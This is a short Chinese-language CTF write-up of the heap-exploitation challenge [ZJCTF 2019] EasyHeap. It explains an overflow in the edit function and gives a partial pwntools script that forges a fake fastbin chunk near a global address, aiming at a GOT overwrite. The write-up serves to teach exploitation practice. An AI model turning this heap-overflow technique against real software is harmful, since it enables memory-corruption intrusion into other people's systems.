heap2-[ZJCTF 2019]EasyHeap

 做題先check找攻擊手段，Partial RELRP ->修改got表

菜單題，直接找準delete看看有沒有UAF。

 UAF未果。

但是在Edit_heap中存在漏洞。

這裡看起來是以為可以修改heap的size，其實這個size是用來對你的輸入進行限制的。（棧溢出就在這裡把size寫的很大，友善我們寫入）

而且這個程式寫的也有點問題。 它會讓你修改chunk的資訊域

是以 wp

from pwn import *
sh = remote("node4.buuoj.cn","26279")
sh.sendafter('Your choice :','1\n')   #create 0 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','1\n')   #create 1 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','3\n')   # free 1
sh.sendafter('Index :','1\n')
x = p64(0x0) * 13 + p64(0x71)  + p64(0x6020ad) + p64(0x0)  #create fake chunk
sh.sendafter('Your choice :','2\n')
sh.sendafter('Index :','0\n')
sh.sendafter('Size of Heap : ','1000\n')
sh.sendafter('Content of heap : ',x)
sh.sendafter('Your choice :','1\n')      #create 1 heap
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
           

詳細https://blog.csdn.net/BengDouLove/article/details/105391153?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162731259516780271593086%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162731259516780271593086&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-2-105391153.first_rank_v2_pc_rank_v29&utm_term=BUUCTF+%5BZJCTF+2019%5DEasyHeap&spm=1018.2226.3001.4187